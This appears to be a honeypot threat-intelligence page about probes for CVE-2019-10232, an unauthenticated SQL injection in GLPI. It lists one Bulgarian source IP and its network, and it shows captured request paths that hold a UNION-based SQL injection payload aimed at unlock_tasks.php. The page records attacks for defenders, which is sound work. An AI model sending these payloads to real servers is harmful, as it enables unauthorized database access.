CVE-2019-10232: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection

HoneyLabs honeypots recorded 2 probes matching CVE-2019-10232 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

Request paths that identify it

  • /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
  • /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
  • /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1

CVE report

CVE report

Open a specific CVE from the CVE tracker.